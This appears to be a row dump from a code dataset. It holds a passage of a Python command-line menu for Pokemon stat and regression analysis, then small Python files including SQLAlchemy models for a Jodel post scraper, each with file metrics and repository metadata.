set_name = "Poison Type"
set_data = loaddata.poison_types
z_set_data = loaddata.z_poison
elif option == "14":
set_name = "Ground Type"
set_data = loaddata.ground_types
z_set_data = loaddata.z_ground
elif option == "15":
set_name = "Rock Type"
set_data = loaddata.rock_types
z_set_data = loaddata.z_rock
elif option == "16":
set_name = "Bug Type"
set_data = loaddata.bug_types
z_set_data = loaddata.z_bug
elif option == "17":
set_name = "Ghost Type"
set_data = loaddata.ghost_types
z_set_data = loaddata.z_ghost
elif option == "18":
set_name = "Steel Type"
set_data = loaddata.steel_types
z_set_data = loaddata.z_steel
elif option == "19":
set_name = "Pokemon"
set_data = loaddata.all_pokemon
z_set_data = loaddata.z_pokemon
else:
return
pokemon_regression.pokemon_regression_analysis(set_name, set_data, z_set_data, modified_data_tag)
return
def do_stat_analysis_non_legendary(option):
if option == "2":
stat_name = "HP"
stat_values = loaddata.non_legendary_hp
stat_value_stats = loaddata.non_legendary_hp_stats
z_stat_values = loaddata.z_non_legendary_hp
z_stat_value_stats = loaddata.z_non_legendary_hp_stats
elif option == "3":
stat_name = "Speed"
stat_values = loaddata.non_legendary_speed
stat_value_stats = loaddata.non_legendary_speed_stats
z_stat_values = loaddata.z_non_legendary_speed
z_stat_value_stats = loaddata.z_non_legendary_speed_stats
elif option == "4":
stat_name = "Attack"
stat_values = loaddata.non_legendary_attack
stat_value_stats = loaddata.non_legendary_attack_stats
z_stat_values = loaddata.z_non_legendary_attack
z_stat_value_stats = loaddata.z_non_legendary_attack_stats
elif option == "5":
stat_name = "Defense"
stat_values = loaddata.non_legendary_defense
stat_value_stats = loaddata.non_legendary_defense_stats
z_stat_values = loaddata.z_non_legendary_defense
z_stat_value_stats = loaddata.z_non_legendary_defense_stats
elif option == "6":
stat_name = "Special Attack"
stat_values = loaddata.non_legendary_sp_attack
stat_value_stats = loaddata.non_legendary_sp_attack_stats
z_stat_values = loaddata.z_non_legendary_sp_attack
z_stat_value_stats = loaddata.z_non_legendary_sp_attack_stats
elif option == "7":
stat_name = "Special Defense"
stat_values = loaddata.non_legendary_sp_defense
stat_value_stats = loaddata.non_legendary_sp_defense_stats
z_stat_values = loaddata.z_non_legendary_sp_defense
z_stat_value_stats = loaddata.z_non_legendary_sp_defense_stats
elif option == "1":
stat_name = "Stat Totals"
stat_values = loaddata.non_legendary_total_points
stat_value_stats = loaddata.non_legendary_total_points_stats
z_stat_values = loaddata.z_non_legendary_total_points
z_stat_value_stats = loaddata.z_non_legendary_total_points_stats
elif option == "8":
stat_name = "Height(m)"
stat_values = loaddata.non_legendary_height
stat_value_stats = loaddata.non_legendary_height_stats
z_stat_values = loaddata.z_non_legendary_height
z_stat_value_stats = loaddata.z_non_legendary_height_stats
elif option == "9":
stat_name = "Weight(kg)"
stat_values = loaddata.non_legendary_weight
stat_value_stats = loaddata.non_legendary_weight_stats
z_stat_values = loaddata.z_non_legendary_weight
z_stat_value_stats = loaddata.z_non_legendary_weight_stats
else:
return
pokemon_stat_analysis.stat_analysis(stat_name, stat_values, z_stat_values, stat_value_stats, z_stat_value_stats,
modifier='(non_legendary)')
return
def do_stat_analysis_legendary(option):
if option == "2":
stat_name = "HP"
stat_values = loaddata.legendary_hp
stat_value_stats = loaddata.legendary_hp_stats
z_stat_values = loaddata.z_legendary_hp
z_stat_value_stats = loaddata.z_legendary_hp_stats
elif option == "3":
stat_name = "Speed"
stat_values = loaddata.legendary_speed
stat_value_stats = loaddata.legendary_speed_stats
z_stat_values = loaddata.z_legendary_speed
z_stat_value_stats = loaddata.z_legendary_speed_stats
elif option == "4":
stat_name = "Attack"
stat_values = loaddata.legendary_attack
stat_value_stats = loaddata.legendary_attack_stats
z_stat_values = loaddata.z_legendary_attack
z_stat_value_stats = loaddata.z_legendary_attack_stats
elif option == "5":
stat_name = "Defense"
stat_values = loaddata.legendary_defense
stat_value_stats = loaddata.legendary_defense_stats
z_stat_values = loaddata.z_legendary_defense
z_stat_value_stats = loaddata.z_legendary_defense_stats
elif option == "6":
stat_name = "Special Attack"
stat_values = loaddata.legendary_sp_attack
stat_value_stats = loaddata.legendary_sp_attack_stats
z_stat_values = loaddata.z_legendary_sp_attack
z_stat_value_stats = loaddata.z_legendary_sp_attack_stats
elif option == "7":
stat_name = "Special Defense"
stat_values = loaddata.legendary_sp_defense
stat_value_stats = loaddata.legendary_sp_defense_stats
z_stat_values = loaddata.z_legendary_sp_defense
z_stat_value_stats = loaddata.z_legendary_sp_defense_stats
elif option == "1":
stat_name = "Stat Totals"
stat_values = loaddata.legendary_total_points
stat_value_stats = loaddata.legendary_total_points_stats
z_stat_values = loaddata.z_legendary_total_points
z_stat_value_stats = loaddata.z_legendary_total_points_stats
elif option == "8":
stat_name = "Height(m)"
stat_values = loaddata.legendary_height
stat_value_stats = loaddata.legendary_height_stats
z_stat_values = loaddata.z_legendary_height
z_stat_value_stats = loaddata.z_legendary_height_stats
elif option == "9":
stat_name = "Weight(kg)"
stat_values = loaddata.legendary_weight
stat_value_stats = loaddata.legendary_weight_stats
z_stat_values = loaddata.z_legendary_weight
z_stat_value_stats = loaddata.z_legendary_weight_stats
else:
return
pokemon_stat_analysis.stat_analysis(stat_name, stat_values, z_stat_values, stat_value_stats, z_stat_value_stats,
modifier='(legendary)')
return
def do_stat_analysis_trimmed(option):
if option == "2":
stat_name = "HP"
stat_values = loaddata.trimmed_hp
stat_value_stats = loaddata.trimmed_hp_stats
z_stat_values = loaddata.z_trimmed_hp
z_stat_value_stats = loaddata.z_trimmed_hp_stats
elif option == "3":
stat_name = "Speed"
stat_values = loaddata.trimmed_speed
stat_value_stats = loaddata.trimmed_speed_stats
z_stat_values = loaddata.z_trimmed_speed
z_stat_value_stats = loaddata.z_trimmed_speed_stats
elif option == "4":
stat_name = "Attack"
stat_values = loaddata.trimmed_attack
stat_value_stats = loaddata.trimmed_attack_stats
z_stat_values = loaddata.z_trimmed_attack
z_stat_value_stats = loaddata.z_trimmed_attack_stats
elif option == "5":
stat_name = "Defense"
stat_values = loaddata.trimmed_defense
stat_value_stats = loaddata.trimmed_defense_stats
z_stat_values = loaddata.z_trimmed_defense
z_stat_value_stats = loaddata.z_trimmed_defense_stats
elif option == "6":
stat_name = "Special Attack"
stat_values = loaddata.trimmed_sp_attack
stat_value_stats = loaddata.trimmed_sp_attack_stats
z_stat_values = loaddata.z_trimmed_sp_attack
z_stat_value_stats = loaddata.z_trimmed_sp_attack_stats
elif option == "7":
stat_name = "Special Defense"
stat_values = loaddata.trimmed_sp_defense
stat_value_stats = loaddata.trimmed_sp_defense_stats
z_stat_values = loaddata.z_trimmed_sp_defense
z_stat_value_stats = loaddata.z_trimmed_sp_defense_stats
elif option == "1":
stat_name = "Stat Totals"
stat_values = loaddata.trimmed_total_points
stat_value_stats = loaddata.trimmed_total_points_stats
z_stat_values = loaddata.z_trimmed_total_points
z_stat_value_stats = loaddata.z_trimmed_total_points_stats
elif option == "8":
stat_name = "Height(m)"
stat_values = loaddata.trimmed_height
stat_value_stats = loaddata.trimmed_height_stats
z_stat_values = loaddata.z_trimmed_height
z_stat_value_stats = loaddata.z_trimmed_height_stats
elif option == "9":
stat_name = "Weight(kg)"
stat_values = loaddata.trimmed_weight
stat_value_stats = loaddata.trimmed_weight_stats
z_stat_values = loaddata.z_trimmed_weight
z_stat_value_stats = loaddata.z_trimmed_weight_stats
else:
return
pokemon_stat_analysis.stat_analysis(stat_name, stat_values, z_stat_values, stat_value_stats, z_stat_value_stats,
modifier='(trimmed)')
return
def do_stat_analysis_full(option):
if option == "2":
stat_name = "HP"
stat_values = loaddata.hp
stat_value_stats = loaddata.hp_stats
z_stat_values = loaddata.z_hp
z_stat_value_stats = loaddata.z_hp_stats
elif option == "3":
stat_name = "Speed"
stat_values = loaddata.speed
stat_value_stats = loaddata.speed_stats
z_stat_values = loaddata.z_speed
z_stat_value_stats = loaddata.z_speed_stats
elif option == "4":
stat_name = "Attack"
stat_values = loaddata.attack
stat_value_stats = loaddata.attack_stats
z_stat_values = loaddata.z_attack
z_stat_value_stats = loaddata.z_attack_stats
elif option == "5":
stat_name = "Defense"
stat_values = loaddata.defense
stat_value_stats = loaddata.defense_stats
z_stat_values = loaddata.z_defense
z_stat_value_stats = loaddata.z_defense_stats
elif option == "6":
stat_name = "Special Attack"
stat_values = loaddata.sp_attack
stat_value_stats = loaddata.sp_attack_stats
z_stat_values = loaddata.z_sp_attack
z_stat_value_stats = loaddata.z_sp_attack_stats
elif option == "7":
stat_name = "Special Defense"
stat_values = loaddata.sp_defense
stat_value_stats = loaddata.sp_defense_stats
z_stat_values = loaddata.z_sp_defense
z_stat_value_stats = loaddata.z_sp_defense_stats
elif option == "1":
stat_name = "Stat Totals"
stat_values = loaddata.total_points
stat_value_stats = loaddata.total_points_stats
z_stat_values = loaddata.z_total_points
z_stat_value_stats = loaddata.z_total_points_stats
elif option == "8":
stat_name = "Height(m)"
stat_values = loaddata.heights
stat_value_stats = loaddata.height_stats
z_stat_values = loaddata.z_height
z_stat_value_stats = loaddata.z_height_stats
elif option == "9":
stat_name = "Weight(kg)"
stat_values = loaddata.weight
stat_value_stats = loaddata.weight_stats
z_stat_values = loaddata.z_weight
z_stat_value_stats = loaddata.z_weight_stats
else:
return
pokemon_stat_analysis.stat_analysis(stat_name, stat_values, z_stat_values, stat_value_stats, z_stat_value_stats)
return
def print_options_sets():
ret_str = f"\n{tab * 6}- - - Select Your Specific Pokemon Data Set - - -\n" + \
f"\n{tab * 4}1: Full Data\n" \
f" {tab * 4}2: Trimmed Data\n" + \
f"{tab * 4}3: Non Legendary Pokemon\n" + \
f"{tab * 4}4: Legendary Pokemon\n" + \
f"{tab * 5}0: EXIT\n"
print(ret_str)
def print_options_types(modifier=''):
ret_str = f""
if len(modifier) > 0:
ret_str += f"\n{tab * 6}- - - Select {modifier} Type - - -\n"
else:
ret_str += f"\n{tab * 6}- - - Select Type - - -\n"
ret_str += f"\n{tab * 4}1: Grass Types {tab * 3}2: Fire Types\n" + \
f"{tab * 4}3: Water Types {tab * 3}4: Electric Types\n" + \
f"{tab * 4}5: Psychic Types {tab * 2}6: Ice Types\n" + \
f"{tab * 4}7: Dragon Types {tab * 2}8: Dark Types\n" + \
f"{tab * 4}9: Fairy Types {tab * 3}10: Normal Types\n" + \
f"{tab * 4}11: Fighting Types {tab * 2}12: Flying Types\n" + \
f"{tab * 4}13: Poison Types {tab * 2}14: Ground Types\n" + \
f"{tab * 4}15: Rock Types {tab * 3}16: Bug Types\n" + \
f"{tab * 4}17: Ghost Types {tab * 2}18: Steel Types\n"
if modifier == "Trimmed":
ret_str += f"{tab * 4}19: All Pokemon (trimmed Height(m) & Weight(kg))\n"
else:
ret_str += f"{tab * 4}19: Entire Set\n"
ret_str += f"{tab * 5}0: EXIT\n"
print(ret_str)
def print_options_stats(modifier=''):
ret_str = f""
if len(modifier) > 0:
ret_str += f"\n{tab * 6}- - - Select {modifier} Stat - - -\n"
else:
ret_str += f"\n{tab * 6}- - - Select Stat - - -\n"
ret_str += f"\n{tab * 6}1: Stat Totals\n" + \
f"{tab * 4}2: HP{tab * 5}3: Speed\n" + \
f"{tab * 4}4: Attack{tab * 4}5: Defense\n" + \
f"{tab * 4}6: Special Attack{tab * 2}7: Special Defense\n" + \
f"{tab * 4}8: Height(m){tab * 3}9: Weight(kg)\n" + \
f"{tab * 5}0: EXIT\n"
print(ret_str)
def print_options_home():
ret_str = f"\n{tab * 6} - - - OPTIONS - - - \n" + \
f"\n{tab * 4}1: Stat Analysis\n" + \
f"{tab * 4}2: Pokemon Regression Analysis\n" + \
f"{tab * 4}3: Testing Normal Distribution against Actual Values\n" + \
f"{tab * 4}4: Are Pokemon Heights Normal or Log distributed?\n" + \
f"{tab * 4}5: Random Pokemon Correlations\n" + \
f"{tab * 4}6: Are Dragon Types Taller Than Non Dragon Types?\n" + \
f"{tab * 5}0: Exit\n"
print(ret_str)
if __name__ == "__main__":
while 1:
print_options_home()
val_home = input(f"\n{tab * 2}Enter Desired Option: ")
if val_home == "1":
print_options_sets()
val_opt_set = input(f"\n{tab * 2}Enter Option: ")
if val_opt_set == "1":
# print options stat analysis full
print_options_stats()
val_opt_stat = input(f"\n{tab * 2}Enter Option: ")
if val_opt_stat == "0":
break
else:
do_stat_analysis_full(val_opt_stat)
elif val_opt_set == "2":
# print options stat analysis trimmed
print_options_stats("Trimmed")
val_opt_stat = input(f"\n{tab * 2}Enter Option: ")
if val_opt_stat == "0":
break
else:
do_stat_analysis_full(val_opt_stat)
elif val_opt_set == "3":
# print options stat analysis non legendary
print_options_stats("Non Legendary Pokemon")
val_opt_stat = input(f"\n{tab * 2}Enter Option: ")
if val_opt_stat == "0":
break
else:
do_stat_analysis_non_legendary(val_opt_stat)
elif val_opt_set == "4":
# print options stat analysis legendary
print_options_stats("Legendary Pokemon")
val_opt_stat = input(f"\n{tab * 2}Enter Option: ")
if val_opt_stat == "0":
break
else:
do_stat_analysis_legendary(val_opt_stat)
else:
break
continue
elif val_home == "2":
print_options_sets()
val_opt_set = input(f"\n{tab * 2}Enter Option: ")
if val_opt_set == "1":
print_options_types()
val_opt_type = input(f"\n{tab * 2}Enter Option: ")
if val_opt_type == "0":
break
else:
do_regression_analysis_full(val_opt_type)
elif val_opt_set == "2":
print_options_types("Trimmed")
val_opt_type = input(f"\n{tab * 2}Enter Option: ")
if val_opt_type == "0":
break
else:
do_regression_analysis_trimmed(val_opt_type)
elif val_opt_set == "3":
print_options_types("Non Legendary Pokemon")
val_opt_type = input(f"\n{tab * 2}Enter Option: ")
if val_opt_type == "0":
break
else:
do_regression_analysis_non_legendary(val_opt_type)
elif val_opt_set == "4":
print_options_types("Legendary Pokemon")
val_opt_type = input(f"\n{tab * 2}Enter Option: ")
if val_opt_type == "0":
break
else:
do_regression_analysis_legendary(val_opt_type)
else:
break
continue
elif val_home == "3":
# print(f"{tab * 4}Testing Normal Distribution against Actual Values")
print_options_sets()
val_opt_set = input(f"\n{tab * 2}Enter Option: ")
if val_opt_set == "0":
break
else:
# print options stat analysis full
print_options_types()
val_opt_type = input(f"\n{tab * 2}Enter Option: ")
if val_opt_type == "0":
break
else:
print_options_stats()
val_opt_stat = input(f"\n{tab * 2}Enter Option: ")
if val_opt_stat == "0":
break
else:
do_normal_dist_against_actual_values([val_opt_set, val_opt_type, val_opt_stat])
continue
elif val_home == "4":
print(f"{tab * 4} Are Pokemon Heights Normal or Log distributed?")
continue
elif val_home == "5":
print(f"{tab * 4} Random Pokemon Correlations")
continue
elif val_home == "6":
pokemon_test_are_dragons_taller.are_dragons_taller()
else:
print("Exit")
break
| 46.485816
| 119
| 0.522862
| 25,559
| 247,444
| 4.722446
| 0.005595
| 0.06338
| 0.112741
| 0.066114
| 0.979089
| 0.968774
| 0.930349
| 0.82716
| 0.744857
| 0.734899
| 0
| 0.02854
| 0.376097
| 247,444
| 5,322
| 120
| 46.494551
| 0.753299
| 0.028629
| 0
| 0.66104
| 0
| 0.000582
| 0.087256
| 0.000263
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002522
| false
| 0
| 0.00097
| 0
| 0.022507
| 0.004851
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
adc792d90ba984c9f4c5ea496185f439bcd852fb
| 65
|
py
|
Python
|
python/tools/lists/reverse.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | 1
|
2021-08-19T13:40:26.000Z
|
2021-08-19T13:40:26.000Z
|
python/tools/lists/reverse.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | null | null | null |
python/tools/lists/reverse.py
|
xanderyzwich/Playground
|
3c8bbfc33383f7ac1c88c2093fbe096cc2c44c3a
|
[
"Apache-2.0"
] | 1
|
2021-03-31T12:37:14.000Z
|
2021-03-31T12:37:14.000Z
|
def reverse_array(input_array):
return reversed(input_array)
| 32.5
| 32
| 0.8
| 9
| 65
| 5.444444
| 0.666667
| 0.408163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 65
| 2
| 33
| 32.5
| 0.859649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
addb7cd6a88702b09abdd64816c43edf063feb4d
| 22
|
py
|
Python
|
RegressionVisualization/ShapeRegressionUtilities/__init__.py
|
jcfr/ShapeRegressionExtension
|
d8b11aeb089bfe36d36a77e217fc75eb3f08e00a
|
[
"Apache-2.0"
] | null | null | null |
RegressionVisualization/ShapeRegressionUtilities/__init__.py
|
jcfr/ShapeRegressionExtension
|
d8b11aeb089bfe36d36a77e217fc75eb3f08e00a
|
[
"Apache-2.0"
] | null | null | null |
RegressionVisualization/ShapeRegressionUtilities/__init__.py
|
jcfr/ShapeRegressionExtension
|
d8b11aeb089bfe36d36a77e217fc75eb3f08e00a
|
[
"Apache-2.0"
] | null | null | null |
from utility import *
| 11
| 21
| 0.772727
| 3
| 22
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
adeae18dc2493ba651b86f09a8bcbd6f101fefe7
| 3,086
|
py
|
Python
|
jodel_scraper_db.py
|
IngoKl/JodelScraper
|
750147927b0c86fe22dfab8af239df13e850593e
|
[
"MIT"
] | null | null | null |
jodel_scraper_db.py
|
IngoKl/JodelScraper
|
750147927b0c86fe22dfab8af239df13e850593e
|
[
"MIT"
] | null | null | null |
jodel_scraper_db.py
|
IngoKl/JodelScraper
|
750147927b0c86fe22dfab8af239df13e850593e
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from sqlalchemy import create_engine, Column, ForeignKey, Integer, String, Boolean, Float, BigInteger
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Jodel(Base):
__tablename__ = 'jodels'
id = Column(Integer, primary_key=True)
added_to_db = Column(BigInteger)
channel = Column(String)
child_count = Column(Integer)
children = Column(String)
color = Column(String)
created_at = Column(String)
discovered_by = Column(Integer)
distance = Column(Integer)
from_home = Column(Boolean)
got_thanks = Column(Boolean)
image_approved = Column(Boolean)
image_url = Column(String)
location_accuracy = Column(Integer)
location_city = Column(String)
location_country = Column(String)
location_lat = Column(Float)
location_lng = Column(Float)
location_name = Column(String)
message = Column(String)
notifications_enabled = Column(Boolean)
oj_replied = Column(Boolean)
pin_count = Column(Integer)
post_id = Column(String)
post_own = Column(String)
replier = Column(Integer)
share_count = Column(Integer)
thumbnail_url = Column(String)
updated_at = Column(String)
user_handle = Column(String)
view_count = Column(Integer)
vote_count = Column(Integer)
def __repr__(self):
return self.post_id
class Reply(Base):
__tablename__ = 'replies'
id = Column(Integer, primary_key=True)
added_to_db = Column(BigInteger)
channel = Column(String)
child_count = Column(Integer)
children = Column(String)
color = Column(String)
created_at = Column(String)
discovered_by = Column(Integer)
distance = Column(Integer)
from_home = Column(Boolean)
got_thanks = Column(Boolean)
image_approved = Column(Boolean)
image_url = Column(String)
jodel_db_id = Column(Integer, ForeignKey('jodels.id'))
location_accuracy = Column(Integer)
location_city = Column(String)
location_country = Column(String)
location_lat = Column(Float)
location_lng = Column(Float)
location_name = Column(String)
message = Column(String)
notifications_enabled = Column(Boolean)
oj_replied = Column(Boolean)
parent_id = Column(String)
pin_count = Column(Integer)
post_id = Column(String)
post_own = Column(String)
replier = Column(Integer)
reply_timestamp = Column(Integer)
thumbnail_url = Column(String)
updated_at = Column(String)
user_handle = Column(String)
vote_count = Column(Integer)
def __repr__(self):
return self.post_id
def get_engine():
"""Creates and populates a new SQLite database and returns the engine."""
if not Path('jodel_scraper.db').is_file():
engine = create_engine('sqlite:///jodel_scraper.db', echo=False)
Base.metadata.create_all(engine)
else:
engine = create_engine('sqlite:///jodel_scraper.db', echo=False)
return engine
| 31.171717
| 102
| 0.6779
| 356
| 3,086
| 5.63764
| 0.266854
| 0.173393
| 0.071749
| 0.021923
| 0.762332
| 0.762332
| 0.762332
| 0.762332
| 0.762332
| 0.715496
| 0
| 0
| 0.229747
| 3,086
| 98
| 103
| 31.489796
| 0.844342
| 0.021711
| 0
| 0.785714
| 0
| 0
| 0.030875
| 0.017839
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.035714
| 0.02381
| 0.928571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bc28e649c1e2d15f16d0fb26a0ede1aee9233850
| 34
|
py
|
Python
|
dexy/reporters/run/__init__.py
|
dsoto/dexy
|
0f2090250040c3c54c8481a16de8e476b559e87c
|
[
"MIT"
] | 136
|
2015-01-06T15:04:47.000Z
|
2021-12-21T22:52:41.000Z
|
dexy/reporters/run/__init__.py
|
dsoto/dexy
|
0f2090250040c3c54c8481a16de8e476b559e87c
|
[
"MIT"
] | 13
|
2015-01-26T14:06:58.000Z
|
2020-03-27T21:16:10.000Z
|
dexy/reporters/run/__init__.py
|
dsoto/dexy
|
0f2090250040c3c54c8481a16de8e476b559e87c
|
[
"MIT"
] | 34
|
2015-01-02T16:24:53.000Z
|
2021-11-27T05:38:30.000Z
|
import dexy.reporters.run.classes
| 17
| 33
| 0.852941
| 5
| 34
| 5.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 34
| 1
| 34
| 34
| 0.90625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bc2b5cedc3c88cec596c104e4f23bf287b202395
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/poetry/core/_vendor/lark/exceptions.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/poetry/core/_vendor/lark/exceptions.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/poetry/core/_vendor/lark/exceptions.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/05/02/9c/d0b1159f66633b77046183ef1d174097290c9d42390acbb13d88890d80
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0
| 96
| 1
| 96
| 96
| 0.395833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.